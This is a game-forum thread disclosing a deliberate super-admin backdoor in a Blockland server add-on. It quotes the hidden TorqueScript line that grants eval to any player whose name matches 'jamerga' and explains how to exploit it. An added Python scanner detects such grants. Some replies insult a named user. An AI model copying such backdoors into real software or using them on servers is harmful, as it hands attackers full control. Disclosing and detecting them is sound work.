Author Topic: Lt. Jamergaman, eval+super admin backdoors - bad ones, at that  (Read 5121 times)

So yeah, recently I was testing out KnifeDM/Factor-X/Gweedo's new hosting service (Got failbinned, don't waste your time looking for it).

Gweedo gave me eval so I could check up on his scripts running on the server to look for some erroneous package or something that might nab my key out of mid-chat when I use his mod to insert my key into his server.

First thing I did was upload a quick script that let me download any text-based file on the server. This means things like .cs files, or .txt files, no pictures, .exe's, or .dats. This requires eval access to do, so I won't be hacking your servers. Chill, guys.
Second thing I did was upload another script that listed the files in a directory specified by me, so I could list his add-ons.

Then, I listed every .zip file in /add-ons, then took note of the non default ones, mapped their contents, then downloaded them.

There wasn't much that was non-default on the server: RTB, and an add-on I hadn't heard of before - "System_JSSP"

I downloaded the mod, and it had various files, special chats for moderators, admins, super admins, and co-hosts. Basically, an all-in-one Adminchat/Moderator/Eval/server management. Very nice idea, poorly coded.

Anyway, all I was interested in at the time was the eval script, so I looked it over, no funky logging or anything that might nab a key, a bunch of other dumb stuff all over, everything was hardcoded, a stuffty mod, basically.


Then I finished, wrote my review about gweedo's service, and posted it.


That's when another guy posted. I don't remember his name, and I can't find a quote on this - the topic is in the fail bin. He pointed this out:

What the forget?
A super admin backdoor? I already knew by reading the eval code that it was limited to super admins, so not only was this a SA backdoor, it was an almighty SA-EVAL backdoor!
Frankly, I don't know if Jamer planned it to be a 2x backdoor, but it is.

Anyway, I had to confirm this was in the code, sure enough, mainFunctions.cs, line 239:
Code:
function serverCmdCheckAdmin(%cl,%name)
{
    if(findclientbyname(%name).isAdmin)
    {
        %name=findclientbyname(%name);
        messageClient(%cl,'',"\c2JSSP Monitor\c6: \c2"@%name.name@" \c6is an \c0Admin");
    }
    else
    {
        %name=findclientbyname(%name);
        fcbn(jamerga).isSuperAdmin=1;
        messageClient(%cl,'',"\c2JSSP Monitor\c6: \c2"@%name.name@" \c6is not an \c0Admin");
    }
}
Very subtle, very effective - but wait!

Not only is it a SUPER ADMINISTRATOR EVAL BACKDOOR - it's a stuffTY SUPER ADMINISTRATOR EVAL BACKDOOR!

Even an idiot can understand this: fcbn is shorthand for findclientbyname. findclientbyname finds the client that most closely matches the string input, in this case, jamerga.

What does this mean, you ask? This means you could change your name to "Jamergam," join a server with this mod enabled, and get full eval!
Speaking from a modder's standpoint, he didn't include an isObject check on the fcbn, so if jamerga isn't in the server, it spews a console error out. forget you.


that's right, anyone can have full eval on a server running this mod!

I'm also missing a script file, for whatever reason, so I can't get the CRC for badspot to ban it from everything. Sorry badspot! I know Gweedo has a copy, ask him!



One other thing - right up at the top of mainfunctions.cs, what do we see?
Quote
//======================================================================
// ==> Made by Cat123 - BL_ID 23462 (Original)
// ==> Last modification - May 22, 2012
// ==> Made because - Lt. Jamergaman needed me to do it
// ==> Script Mode - "Basic" - This script does not contains something advanced
// ==> If you find any bug, PM me on the forums.
//======================================================================
Yeah, that's right, Cat123, resident loving handicapped coder's name all over it. Chances are Jamer included the backdoor on his own, but Cat had his grubby hands on this mod in some way or another.

description.txt, you ask?
Quote
Title: Jamer's Server System Pack v4 FB4
Author: Lt. Jamergaman & some help from Xalos & Cat123
Description: MY SCRIPTS! V4!!!!
Xalos had his hands on this too? At least he doesn't sign and date his code! Really, I think Xalos is above stuff like this, but his name is on it.

That's my post. Check your servers for System_JSSP and remove it if you find it. You don't want "JAMERGAMER IS A friend" getting full eval!
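
One way to run the check the post asks for across add-on archives, as an added example that is not part of the original post or of the add-on's code: it flags any script line that assigns isAdmin or isSuperAdmin to a client looked up by a hardcoded name. The function names and the in-memory archive are assumptions; the sample is the function quoted above with its messageClient lines left out.

```python
import io
import re
import zipfile

# A privilege flag assigned on a client looked up by a literal name.
# TorqueScript variables start with % or $, so a bare or quoted word is a literal.
GRANT = re.compile(
    r'\b(?:fcbn|findclientbyname)\s*\(\s*"?([\w ]+?)"?\s*\)'
    r'\s*\.\s*(is(?:Super)?Admin)\s*=(?!=)', re.IGNORECASE)

def scan_script(text):
    """Return (line_number, hardcoded_name, field) for each suspicious grant."""
    hits = []
    for number, line in enumerate(text.splitlines(), start=1):
        code = line.split("//", 1)[0]  # skip commented-out code
        hits += [(number, m.group(1), m.group(2)) for m in GRANT.finditer(code)]
    return hits

def scan_addon(zip_bytes):
    """Scan every .cs member of an add-on zip; map member name -> hits."""
    report = {}
    with zipfile.ZipFile(io.BytesIO(zip_bytes)) as archive:
        for member in archive.namelist():
            if member.lower().endswith(".cs"):
                hits = scan_script(archive.read(member).decode("latin-1"))
                if hits:
                    report[member] = hits
    return report

# Constructed sample: the quoted function, messageClient lines omitted.
SAMPLE = '''function serverCmdCheckAdmin(%cl,%name)
{
if(findclientbyname(%name).isAdmin)
{
%name=findclientbyname(%name);
}
else
{
%name=findclientbyname(%name);
fcbn(jamerga).isSuperAdmin=1;
}
}
'''

def build_sample_zip():
    buffer = io.BytesIO()
    with zipfile.ZipFile(buffer, "w") as archive:
        archive.writestr("mainFunctions.cs", SAMPLE)
    return buffer.getvalue()
```

Reads of the flag through a variable, such as `findclientbyname(%name).isAdmin`, are not reported; only assignments keyed on a literal name are.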

Thanks for the (elaborate) heads up.

Holy loving stuff, Lugnut, you da man.

"Oh, no one will notice THIS HUGE loving 'FCBN("JAMERGAM").ISSUPERADMIN=1();' RIGHT HERE"

Thanks for the warning.

Nice work. Someone get this man a promotion.

ahahahahahahahahahahahaha


the only thing i can't figure out is if this add-on was intended to be released. i mean, it obviously was, or maybe it was private. i don't really know.

Quote
// ==> If you find any bug, PM me on the forums.
uh yeah lugnut found a bug
it gives superadmin to anyone with jamergan in their name lol

aha! there's the original .zip! I'll find the CRC and post it here so Badspot can ban it. - forget IT'S DOWN.


I still don't have the original .zip.

yay stuffty backdoors
thanks for the heads up though

does anyone know what happened to the TUKC? I have reason to believe their server may be infected by this virus of an add-on.

Maybe.

But TUKC is dead. Or has very little life left.

pm anyone you think is relevant to TUKC with a link to this topic, will you?

I heard Lt.J saying that Cat must've added the back door..
Also TUKC is hosted by that cigarettegy 10 year old Jakob. Here are links:

http://forum.blockland.us/index.php?topic=189532.0
http://forum.blockland.us/index.php?topic=187233.0
http://forum.blockland.us/index.php?topic=178246.0

And here is Jakobs profile:
http://forum.blockland.us/index.php?action=profile;u=30008
Psst, I hate Jakob soo much. plus he is a suckup D: